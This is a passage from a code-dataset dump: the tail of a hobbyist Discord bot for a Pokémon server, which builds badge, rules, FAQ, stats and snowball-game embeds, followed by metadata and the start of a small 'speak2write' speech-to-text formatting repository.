Electrik)\"\r\n\t\t\telif member.id in celadon:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Celadon - Grass)\"\r\n\t\t\telif member.id in fuschia:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Fuchsia - Poison)\"\r\n\t\t\telif member.id in saffron:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Saffron - Psychic)\"\r\n\t\t\telif member.id in cinnabar:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Cinnabar - Fire)\"\r\n\t\t\telif member.id in viridian:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Viridian - Ground)\"\r\n\t\t\telif member.id in violet:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Violet - Flying)\"\r\n\t\t\telif member.id in azalea:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Azalea - Bug)\"\r\n\t\t\telif member.id in goldenrod:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Goldenrod - Normal)\"\r\n\t\t\telif member.id in ecruteak:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Ecruteak - Ghost)\"\r\n\t\t\telif member.id in cianwood:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Cianwood - Fighting)\"\r\n\t\t\telif member.id in olivine:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Olivine - Steel)\"\r\n\t\t\telif member.id in mahogany:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Mahogany - Ice)\"\r\n\t\t\telif member.id in blackthorn:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Blackthorn - Dragon)\"\r\n\t\t\telif member.id in laverre:\r\n\t\t\t\tfeatures17 = \"Gym Leader (Laverre - Fairy)\"\r\n\t\t\telse:\r\n\t\t\t\tfeatures17 = \"Gym Leader\"\r\n\telse:\r\n\t\tfeatures17 = \"No Specific Role\"\r\n\r\n\tif member.id in pewter2:\r\n\t\tfeatures = \"<:Pewter:449610408060518410>\"\r\n\t\tif member.id in cerulean2:\r\n\t\t\tfeatures1 = \"<:Cerulean:449610403178217491>\"\r\n\t\t\tif member.id in vermilion2:\r\n\t\t\t\tfeatures2 = \"<:Vermilion:449610409692102666>\"\r\n\t\t\t\tif member.id in celadon2:\r\n\t\t\t\t\tfeatures3 = \"<:Celadon:449610403266297859>\"\r\n\t\t\t\t\tif member.id in fuschia2:\r\n\t\t\t\t\t\tfeatures4 = \"<:Fuchsia:449610407347355659>\"\r\n\t\t\t\t\t\tif member.id in fuschia2:\r\n\t\t\t\t\t\t\tfeatures4 = \"<:Fuchsia:449610407347355659>\"\r\n\t\t\t\t\t\t\tif member.id in saffron2:\r\n\t\t\t\t\t\t\t\tfeatures5 = \"<:Saffron:449610409637576714>\"\r\n\t\t\t\t\t\t\t\tif member.id in cinnabar2:\r\n\t\t\t\t\t\t\t\t\tfeatures6 = \"<:Cinnabar:449610408177958914>\"\r\n\t\t\t\t\t\t\t\t\tif member.id in viridian2:\r\n\t\t\t\t\t\t\t\t\t\tfeatures7 = \"<:Viridian:449610409549365248> \"\r\n\t\t\t\t\t\t\t\t\t\tif member.id in violet2:\r\n\t\t\t\t\t\t\t\t\t\t\tfeatures8 = \"<:Violet:449610409755017216>\"\r\n\t\t\t\t\t\t\t\t\t\t\tif member.id in azalea2:\r\n\t\t\t\t\t\t\t\t\t\t\t\tfeatures9 = \"<:Azalea:449610403782066177>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\tif member.id in goldenrod2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures10 = \"<:Goldenrod:449610409364684800>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in ecruteak2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures11 = \"<:Ecruteak:449610409138454542>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in cianwood2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures12 = \"<:Cianwood:449610404566401035>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in olivine2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures13 = \"<:Olivine:449610409528393728>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in mahogany2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures14 = \"<:Mahogany:449610411260772362>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in blackthorn2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures15 = \"<:Blackthorn:449610403987849216>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in laverre2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures16 = \"<:Laverre:449610407422722069>\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures1 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures2 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures3 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures4 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures5 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures6 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures7 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures8 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures9 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures10 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures11 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures12 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures13 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures14 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures15 = \"ㅤㅤ\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeatures16 = \"ㅤㅤ\"\r\n\tb1 = \"ㅤ\"\r\n\tb2 = \"ㅤ\"\r\n\tleague1 = \"<:Didnt_Start:449628615999488000>\"\r\n\tleague2 = \"Didn't start the League\"\r\n\r\n\tif member.id in laverre2:\r\n\t\tb1 = \"No Badges Left! \"\r\n\t\tnumber = \"(17/17)\"\r\n\t\tif member.id in comp:\r\n\t\t\tb2 = \"You finished the League.\"\r\n\t\telse:\r\n\t\t\tb2 = \"You can access the League.\"\r\n\telse:\r\n\t\tb1 = \"Badges Left: \"\r\n\t\tnumber = \"(0/17)\"\r\n\t\tif member.id in pewter2:\r\n\t\t\tb2 = \"16 badges left\"\r\n\t\t\tnumber = \"(1/17)\"\r\n\t\t\tif member.id in cerulean2:\r\n\t\t\t\tb2 = \"15 badges left\"\r\n\t\t\t\tnumber = \"(2/17)\"\r\n\t\t\t\tif member.id in vermilion2:\r\n\t\t\t\t\tb2 = \"14 badges left\"\r\n\t\t\t\t\tnumber = \"(3/17)\"\r\n\t\t\t\t\tif member.id in celadon2:\r\n\t\t\t\t\t\tb2 = \"13 badges left\"\r\n\t\t\t\t\t\tnumber = \"(4/17)\"\r\n\t\t\t\t\t\tif member.id in fuschia2:\r\n\t\t\t\t\t\t\tb2 = \"12 badges left\"\r\n\t\t\t\t\t\t\tnumber = \"(5/17)\"\r\n\t\t\t\t\t\t\tif member.id in saffron2:\r\n\t\t\t\t\t\t\t\tb2 = \"11 badges left\"\r\n\t\t\t\t\t\t\t\tnumber = \"(6/17)\"\r\n\t\t\t\t\t\t\t\tif member.id in cinnabar2:\r\n\t\t\t\t\t\t\t\t\tb2 = \"10 badges left\"\r\n\t\t\t\t\t\t\t\t\tnumber = \"(7/17)\"\r\n\t\t\t\t\t\t\t\t\tif member.id in viridian2:\r\n\t\t\t\t\t\t\t\t\t\tb2 = \"9 badges left\"\r\n\t\t\t\t\t\t\t\t\t\tnumber = \"(8/17)\"\r\n\t\t\t\t\t\t\t\t\t\tif member.id in violet2:\r\n\t\t\t\t\t\t\t\t\t\t\tb2 = \"8 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\tnumber = \"(9/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\tif member.id in azalea2:\r\n\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"7 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(10/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\tif member.id in goldenrod2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"6 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(11/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in ecruteak2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"5 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(12/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in cianwood2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"4 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(13/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in olivine2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"3 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(14/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in mahogany2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"2 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(15/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in blackthorn2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"1 badge left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(16/17)\"\r\n\t\telse:\r\n\t\t\tb2 = \"No badges acquired.\"\r\n\r\n\tif member.id in laverre2:\r\n\t\tif member.id in started:\r\n\t\t\tleague1 = \"<:Elite_4_Fight:449629015872110592>\"\r\n\t\t\tleague2 = \"Started the League\"\r\n\t\t\tif member.id in master:\r\n\t\t\t\tleague1 = \"<:Elite_Master_Fight:449628615156564015>\"\r\n\t\t\t\tleague2 = \"Fighting VS. Elite Master\"\r\n\t\t\t\tif member.id in comp:\r\n\t\t\t\t\tleague1 = \"<:Completed:449628616284831744>\"\r\n\t\t\t\t\tleague2 = \"Completed the League\"\r\n\t\tif member.id in master:\r\n\t\t\t\tleague1 = \"<:Elite_Master_Fight:449628615156564015>\"\r\n\t\t\t\tleague2 = \"Fighting VS. Elite Master\"\r\n\t\t\t\tif member.id in comp:\r\n\t\t\t\t\tleague1 = \"<:Completed:449628616284831744>\"\r\n\t\t\t\t\tleague2 = \"Completed the League\"\r\n\t\tif member.id in comp:\r\n\t\t\t\t\tleague1 = \"<:Completed:449628616284831744>\"\r\n\t\t\t\t\tleague2 = \"Completed the League\"\r\n\r\n\r\n\te.set_footer(text = f\"Member since: {member.joined_at.__format__('%d %b %Y at %H:%M:%S')}\")#.timestamp = member.joined_at\r\n\te.add_field(name = 'Account created at', value = member.created_at.__format__('Date: **%d %b %Y**\\nTime: **%H:%M:%S**\\nㅤ'))\r\n\te.add_field(name = 'User ID', value = member.id)\r\n\te.add_field(name = f\"{b1}{number}\", value = b2, inline=True)\r\n\te.add_field(name = f\"Social Status/Role {league1}\", value = f\"{features17}\\n{league2}\", inline=True)\r\n\te.add_field(name = 'Pokébadges', value = f\"{features}ㅤ{features1}ㅤ{features2}ㅤ{features3}ㅤ{features4}ㅤ{features5}\\n\\n{features6}ㅤ{features7}ㅤ{features8}ㅤ{features9}ㅤ{features10}ㅤ{features11}\\n\\n{features12}ㅤ{features13}ㅤ{features14}ㅤ{features15}ㅤ{features16}\", inline = True)\r\n\r\n\tawait ctx.send(embed=e)\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t CUSTOM EMBEDS \t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected]()\r\nasync def erules(ctx):\r\n\r\n\te = discord.Embed(colour = discord.Colour(0x7289DA))\r\n\te2 = discord.Embed(colour = discord.Colour(0x7289DA))\r\n\r\n\tguild = ctx.guild\r\n\tavi = guild.icon_url\r\n\tberry = bot.get_user(385419569558323202)\r\n\tgeneral = bot.get_channel(457860924515155969)\r\n\tinternational = bot.get_channel(457860854017294336)\r\n\tsuggestion = bot.get_channel(449199119148253195)\r\n\tannouncement = bot.get_channel(447492742315114496)\r\n\tfaq = bot.get_channel(450039051169300500)\r\n\tpokemon = bot.get_channel(457860659095535626)\r\n\ttrading1 = bot.get_channel(450040365555122187)\r\n\ttrading2 = bot.get_channel(450040431686713367)\r\n\r\n\te.set_author(name = \"Welcome to Pokémon Universe\", icon_url = avi)\r\n\te.add_field(name = \"Server Rules\", value = \"**#1.** No need for personal attacks. If you have a problem with someone contact one of the Admins/Mods, we will help you.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#2.** Spam of any kind will not be tolerated and may result in a server mute.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#3.** No NSFW content.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#4.** Don't impersonate other players.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#5.** Don't use commands other than `p!catch` and `p!info` in {general.mention} or {international.mention}.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#6.** Try to keep swearing to a minimum in {general.mention}, some swearing will be tolerated but try not to.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#7.** Don't advertise your servers in chat or in DMs *(3 day mute in the server, if repeated you will be banned - DM advertising = ban)*\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#8.** {suggestion.mention} is not for having conversations or using the bot commands, it's for suggestions, use the correct channels.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#9.** No racial slurs.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#10.** Don't tag {berry.mention} or Admins unless there is an urgent issue. Try messaging a Moderator first. Doing so for no reason will result in a 2 hour mute.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#11.** Try not to beg for credits/redeems/pokemons.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#12.** Don't joke about suicide.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#13.** Keep chat in English or use {international.mention}.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#14.** Read {faq.mention} and {announcement.mention} before messaging a staff member, chances are the answer to your question is in there.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#15.** Do not repeatedly use a bot command for no reason.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#16.** Don't use `p!info <pokemon>` in general use {pokemon.mention} please.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#17.** Follow Discord [Terms of Service](https://discordapp.com/terms) and [Community Guidelines](https://discordapp.com/guidelines)\", inline=False)\r\n\r\n\te2.add_field(name = \"Trading Rules\", value = \"**#1.** As it is easy to guess, scamming is forbidden.\", inline=False)\r\n\te2.add_field(name = \"ㅤ\", value = f\"**#2.** Use {trading1.mention} and {trading2.mention} only to advertise your offers.\", inline=False)\r\n\te2.add_field(name = \"ㅤ\", value = \"**#3.** If your trading message is considered too long a mod may warn you for it, and if repeated you will be muted.\", inline=False)\r\n\te2.add_field(name = \"ㅤ\", value = \"**#4.** Posting more than ONE trading message per minute will result in a mute/warn.\", inline=False)\r\n\te2.set_footer(text = \"If a rule is broken and no Admins or Moderators see it, please mention a Moderator.\", icon_url=avi)\r\n\r\n\tawait ctx.send(embed = e)\r\n\tawait ctx.send(embed = e2)\r\n\r\n###################################################################################\r\n\r\[email protected]()\r\nasync def eroles(ctx):\r\n\r\n\te = discord.Embed(colour = discord.Colour(0x7289DA))\r\n\r\n\tguild = ctx.guild\r\n\tavi = guild.icon_url\r\n\tmee = bot.get_user(159985870458322944)\r\n\tpoke = bot.get_user(448885364275281931)\r\n\r\n\te.set_author(name = \"Self-Assignable Roles\", icon_url = avi)\r\n\te.description= \"If you want a role, just click the correct emoji dedicated to that role you'd like to have to assign it to yourself.\\nIf you would like to take it off, just click the emoji again to remove it!\"\r\n\te.add_field(name=\"Leveled Roles\", value=f\"Those are automatically assigned by {mee.mention} when you meet the correct level.\", inline=False)\r\n\te.add_field(name=\"Other Roles\", value=f\"Those are assigned by Gym Leaders/Elite Fours using {poke.mention} when you beat their arena.\", inline=False)\r\n\te.set_footer(text = \"Custom Roles can be bought by donating at least 1$.\")\r\n\r\n\tawait ctx.send(embed = e)\r\n\r\n###################################################################################\r\n\r\[email protected]()\r\nasync def efaq(ctx):\r\n\r\n\te = discord.Embed(colour = discord.Colour(0x7289DA))\r\n\te2 = discord.Embed(colour = discord.Colour(0x7289DA))\r\n\r\n\tguild = ctx.guild\r\n\tavi = guild.icon_url\r\n\tpoke = bot.get_user(448885364275281931)\r\n\trules = bot.get_channel(447493465241026560)\r\n\trole = bot.get_channel(449199056154263552)\r\n\tannouncement = bot.get_channel(447492742315114496)\r\n\r\n\te.set_author(name = \"Donations\", icon_url = avi)\r\n\te.add_field(name=\"Why would I donate?\", value=f\"Donating supports the server but also the developement of {poke.mention}. But you also get perks: 250 credits for each 25 cents donated! Also, you get a special role that only donators have and a custom role if you donate 1$ or more.\\nㅤ\", inline=False)\r\n\te.add_field(name=\"Where can I donate?\", value=\"You can donate through PayPal with the link provided by `p!donation`.\", inline=False)\r\n\r\n\te2.set_author(name = \"Others Questions\", icon_url = avi)\r\n\te2.add_field(name=\"IVs and Pokemon Stats\", value=\"IVs now can be seen with `p!detailed` and then `p!info`. IVs are individual values of each unique pokemon and they do not change through levels. They are used to calculate the final stats of each pokemon. They range from 0-31.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"Can I be unmuted please?\", value=\"If you're muted it's for a reason nah? If not, prove it. So... No.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"Can I message Admins privately?\", value=\"Yes. But please, only do when its absolutely important. You are not the only one who thought of messaging an admin/mod to joke around. We don't wanna get tons of messages as after some point it gets annoying.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"This person is catching all the pokemon! They are using copy-pasting to catch! We can't catch pokemon when they are here.\", value=\"What do you expect us to do? It's all fair game. Just do what they are doing if you are so desperate to catch pokemon.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"Can you spawn a pokemon?\", value=\"No we can't, sorry.. ^^'\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"Can you give me a pokemon?\", value=f\"Read the {rules.mention}, no begging.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"When are you gonna do giveaways?\", value=\"When the server hits major membercounts for example, hitting 100 players.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"Where's the spam/NSFW channel?\", value=\"Nowhere. Spamming and NSFW is not allowed in the server in any channel. If you wanna see NSFW things there are webpages for that.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"How much is <pokemon> worth?\", value=\"There are no set prices. The prices vary depending on how many people want the pokemon and how strong it is. You decide how much a pokemon is worth following market prices. Not admins.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"How do I make my own team?\", value=f\"We are not accepting any new teams at the moment. Please join the already existing ones. You can find them in {role.mention}.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"How can we be recruited?\", value=f\"When we need new staffs, we post a Google Document (to fill in) in {announcement.mention}, you must be active and fill this Document seriously with developed answers.\", inline=False)\r\n\te2.set_footer(text =\"Any other questions? You can ask other members or contact the staff team.\")\r\n\r\n\tawait ctx.send(embed = e)\r\n\tawait ctx.send(embed = e2)\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t BOT/SERVER STATS \t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['stats'])\r\nasync def about(self):\r\n stat1 = discord.Embed(colour = discord.Colour(0xE4D7FF))\r\n servers = len(bot.guilds)\r\n members=0\r\n for guild in bot.guilds:\r\n members+=len(guild.members)\r\n total_online = len({m.id for m in self.bot.get_all_members() if m.status is not discord.Status.offline})\r\n total_unique = len(self.bot.users)\r\n total_bots = len([m.id for m in self.bot.get_all_members() if m.bot])\r\n categories=0\r\n for guild in bot.guilds:\r\n categories+=len(guild.categories)\r\n channels=0\r\n for guild in bot.guilds:\r\n channels+=len(guild.channels)\r\n texts=0\r\n for guild in bot.guilds:\r\n texts+=len(guild.text_channels)\r\n voices=0\r\n for guild in bot.guilds:\r\n voices+=len(guild.voice_channels)\r\n\r\n stat2 = bot.get_user(390478999828037632)\r\n\r\n stat1.set_author(name= stat2)\r\n stat1.add_field(name= \"Members in serverㅤ\", value=f\"Total Users: **{members}** \\nTotal Uniques: **{total_unique}** \\nTotal Online: **{total_online}** \\nTotal BOTS: **{total_bots}**\", inline=True)\r\n stat1.add_field(name= \"Channels in server\", value=f\"Total Categories: **{categories}** \\nTotal Channels: **{channels}** \\nText Channels: **{texts}** \\nVoice Channels: **{voices}**\", inline=True)\r\n stat1.add_field(name= \"Program Informations\", value=f\"Program Language: **<:Python:453634265197051934> 3.6.3** \\nDiscord Program: **Discord.py** \\nProgram Version: **1.0.0a**\", inline=True)\r\n stat1.add_field(name= \"ㅤRun/Bot Informations\", value=f\"ㅤRunning on: **Heroku** <:Heroku:453634258041438210>\\nㅤEdited with: **Sublime Text 3** <:Sublime:453634264248877056>\\n\\nㅤ*More with `p!helpme` command*\", inline=True)\r\n await self.send(embed = stat1)\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t SNOWBALL COMMAND \t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected](aliases = ['sb'])\r\nasync def snowball(ctx, *, member : discord.Member = None):\r\n\r\n number = random.randint(1, 5)\r\n\r\n if not member:\r\n await ctx.send(f\"**{ctx.author.name}**, maybe an option to throw it at someone!\")\r\n elif member is ctx.author:\r\n await ctx.send(f\"**{ctx.author.name}**, maybe an option to throw it at someone else!\")\r\n else:\r\n if number == 1:\r\n snowball_hit = [\r\n f\":snowflake: **| {ctx.author.name}**, throws a snowball in **{member.name}**'s face! *ouchh*\",\r\n f\":snowflake: **| {ctx.author.name}**, throws a snowball in **{member.name}**'s face! *ouchh*\",\r\n f\":snowflake: **| {ctx.author.name}**, throws a snowball in **{member.name}**'s face! *ouchh*\",\r\n f\":snowflake: **| {ctx.author.name}**, throws an __iceball__ in **{member.name}**'s face! *ouchh... these ones hurt...*\",\r\n ]\r\n\r\n choice_hit = random.choice(snowball_hit)\r\n hit = discord.Embed(colour = discord.Colour(0xE4D7FF))\r\n hit.description = f\"{choice_hit}\"\r\n await ctx.send(embed = hit)\r\n else:\r\n snowball_miss = [\r\n f\":snowflake: **| {member.name}** dodged the snowball thrown by **{ctx.author.name}**!\",\r\n f\":snowflake: **| {ctx.author.name}**, tried to throw a snowball at **{member.name}** and missed!\",\r\n f\":snowflake: **| {ctx.author.name}**, missed and threw the snowball through a window! *Oops*\",\r\n f\":snowflake: **| {member.name}** laughed at **{ctx.author.name}**, how can you miss me?\",\r\n f\":snowflake: **| {ctx.author.name}** tries to use all their energy, and fell on the ground! *definitely a miss*\",\r\n f\":snowflake: **| {ctx.author.name}**, tried to throw an __iceball__ at **{member.name}** and missed! Lucky you, **{member.name}**!\",\r\n ]\r\n\r\n choice_miss = random.choice(snowball_miss)\r\n miss = discord.Embed(colour = discord.Colour(0xE4D7FF))\r\n miss.description = f\"{choice_miss}\"\r\n await ctx.send(embed = miss)\r\n\r\n###################################################################################\r\n\r\nif not os.environ.get('TOKEN'):\r\n print(\"No token found REEEE!\")\r\nbot.run(os.environ.get('TOKEN').strip('\\\"'))\r\n\r\n#https://discordapp.com/oauth2/authorize/?permissions=2138569983&scope=bot&client_id=448885364275281931\r\n" } ]
1
Utkarshupd/speak2write
https://github.com/Utkarshupd/speak2write
a1c30edadd265fc257902d47fbfc54e32323c040
de301bc407141ad3470d1ec11cb90d636eb77684
7b59b7eccc8cbe527930e262ab0b445a6d06b681
refs/heads/master
2020-08-28T16:50:32.024667
2019-10-26T20:11:16
2019-10-26T20:11:16
217,500,431
0
0
MIT
2019-10-25T09:32:30
2019-10-25T12:51:30
2019-10-25T12:51:28
Python
[ { "alpha_fraction": 0.7184643745422363, "alphanum_fraction": 0.7285192012786865, "avg_line_length": 38.07143020629883, "blob_id": "a674dd984f0b5588829de03cd0dda2096bc26dce", "content_id": "86e15e5ca9248ce3c4f7ce99b4747bf2d7138005", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1094, "license_type": "permissive", "max_line_length": 110, "num_lines": 28, "path": "/README.md", "repo_name": "Utkarshupd/speak2write", "src_encoding": "UTF-8", "text": "# speak2write:\n\nThis is a special library which is build to convert speech from spoken format to written format.\n\nFor example: \" I have two dollars\" should be conerted to \"I have 2$\"\n\nThe solution of the problem consists of many layers of functions, each doing its own stuff.\n\n## Features Implemented:\n- 1- Preprocessing the input.\n \n Given the input in raw form. This module helps speech data to get into better format for the conversion.\n \n- 2- Text2integer will convert numbers in words format to their respective number format.\n \n Two hundred = 200\n \n - 3- Currency Converter will convert given currency in text foramt into its currency format.\n \n 5 dollars = 5$\n \n## Features to be implemented:\n\n- Reading data from any format. Currently we can only give spoken text data in string format.\n- We have to take care of text Abbreventions such as 'dunno' should be converted to 'do not know', etc.\n- Pauses in speech must be handled.\n- fillers in speech must be handled.\n- same word occuring more than one time one after the other must be handled.\n" }, { "alpha_fraction": 0.48765432834625244, "alphanum_fraction": 0.4888888895511627, "avg_line_length": 27.629629135131836, "blob_id": "3c8e71682520b07f1b352ca8d42a6609c3aeaa01", "content_id": "c3b6e11ab358ae9820e3dc4f71180427acd35111", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 810, "license_type": "permissive", "max_line_length": 84, "num_lines": 27, "path": "/speak2write/currency.py", "repo_name": "Utkarshupd/speak2write", "src_encoding": "UTF-8", "text": "#This code only for conversion of currency dollar.Any other currency can be updated.\r\n\r\nclass Dollar:\r\n def __init__(self, value):\r\n self.value = value\r\n def __add__(self, other):\r\n return Dollar(self.value + other.value)\r\n def __sub__(self, other):\r\n return Dollar(self.value - other.value)\r\n def __repr__(self):\r\n return 'Dollar({})'.format(self.value)\r\n def __str__(self):\r\n return '${:.2f}'.format(self.value)\r\n \r\n\r\nclass currency(object):\r\n \"\"\"docstring for currency\"\"\"\r\n def __init__(self):\r\n pass\r\n\r\n def tocurrency(sentence):\r\n \r\n for i in sentence:\r\n if i.isdigit():\r\n return Dollar(i).__str__()\r\n else:\r\n pass\r\n\r\n " }, { "alpha_fraction": 0.5959596037864685, "alphanum_fraction": 0.5959596037864685, "avg_line_length": 30.68000030517578, "blob_id": "0a178ffbf00302d9cc2dc6c1a80762ea0b57bb43", "content_id": "b352ee2a216af6ed56c6262b0b60f27ee6300643", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1584, "license_type": "permissive", "max_line_length": 114, "num_lines": 50, "path": "/speak2write/preprocess_text.py", "repo_name": "Utkarshupd/speak2write", "src_encoding": "UTF-8", "text": "import string\nimport re\n\nclass preprocess_text:\n 